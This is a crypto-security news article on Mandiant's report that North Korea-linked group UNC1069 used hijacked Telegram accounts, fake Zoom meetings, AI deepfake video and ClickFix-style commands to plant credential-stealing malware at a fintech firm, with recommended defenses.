Google’s cybersecurity division Mandiant has issued a warning that threat actors linked to North Korea are increasingly incorporating AI-generated deepfake technology into sophisticated social engineering campaigns targeting cryptocurrency and fintech companies.
In a report released Monday, Mandiant detailed a recent investigation into a breach at a fintech firm attributed to UNC1069 — also known as “CryptoCore” — a threat cluster assessed to have strong ties to North Korea. The operation combined compromised Telegram accounts, fraudulent Zoom meetings, and a technique known as “ClickFix” to trick victims into executing malicious commands. Investigators also identified evidence that AI-generated video was used during the fake meeting to enhance the credibility of the impersonation.
Highly Targeted Social Engineering Campaigns
According to Mandiant, UNC1069 has expanded its focus beyond broad phishing campaigns to conduct highly personalized attacks aimed at organizations and individuals in the crypto ecosystem. Targets reportedly include software companies, blockchain developers, venture capital firms, and executive leadership teams.
The attack chain described in the report began when a victim was contacted via Telegram by what appeared to be a well-known crypto industry executive. However, the account had allegedly been compromised and was under attacker control. After establishing rapport, the attacker sent a Calendly scheduling link for a 30-minute meeting, redirecting the victim to a fraudulent Zoom session hosted on infrastructure controlled by the threat group.
During the call, the victim reportedly observed what appeared to be a recognizable crypto CEO on video — later assessed to be AI-generated deepfake content.
Shortly after the meeting began, the attackers claimed there were audio issues and instructed the victim to execute specific “troubleshooting” commands — a variation of the ClickFix technique. This action triggered the deployment of malware. Subsequent forensic analysis identified seven distinct malware families on the victim’s system, designed to steal login credentials, browser data, and session tokens for financial theft and further impersonation.
Escalation of Crypto Theft Linked to North Korea
The warning comes amid continued growth in crypto-related theft attributed to North Korean-linked actors. In mid-December, blockchain analytics firm Chainalysis reported that hackers associated with Pyongyang stole approximately $2.02 billion in digital assets in 2025 — a 51% increase compared to the previous year. The cumulative value of digital assets allegedly stolen by such groups is now estimated at around $6.75 billion, even though the total number of incidents has declined.
These figures suggest a shift toward fewer but more financially impactful operations.
Security analysts note that rather than relying on mass phishing emails, groups like CryptoCore are increasingly leveraging trusted communication channels — including messaging apps and video conferencing platforms — to exploit familiarity and professional trust. By embedding malicious activity within routine business interactions, attackers reduce visible red flags and increase the likelihood of success.
Deepfake and AI Amplify Impersonation Tactics
Fraser Edwards, Co-founder and CEO of decentralized identity company cheqd, stated that the incident reflects a broader evolution in cybercrime tactics, particularly as remote collaboration and virtual meetings become standard across the digital asset sector.
He emphasized that the effectiveness of such operations lies in their subtlety: familiar senders, recognizable meeting formats, and no obvious malicious attachments. Trust is established before technical safeguards have the opportunity to intervene.
According to Edwards, deepfake video is often introduced during escalation stages — such as live calls — where the visual presence of a familiar face can override suspicion triggered by unusual requests or technical disruptions. The objective is not prolonged interaction, but sufficient realism to prompt the target to take a critical action.
AI is also reportedly being used beyond video impersonation. Tools capable of drafting context-aware messages, mimicking tone, and replicating communication styles make fraudulent outreach significantly harder to detect. As AI agents become more integrated into daily workflows — sending messages, scheduling meetings, and acting on behalf of users — the potential scale of automated impersonation increases.
The Need for Default Security Infrastructure
Edwards argues that expecting individuals to reliably detect deepfakes is unrealistic. Instead, organizations should focus on strengthening default security systems, improving authentication layers, and clearly signaling content authenticity.
Rather than relying solely on user vigilance, experts recommend implementing multi-factor authentication, hardware security keys, session monitoring, and zero-trust frameworks — particularly for companies handling digital assets.
As AI capabilities advance, the line between authentic and synthetic communication continues to blur, creating new operational risks for crypto-native firms that rely heavily on digital trust.
This article is provided for informational purposes only and does not constitute investment advice. Readers should conduct their own research and assess risk before making any financial decisions.
Follow for more verified crypto security updates and institutional market insights.
#CryptoNews #CyberSecurity #Aİ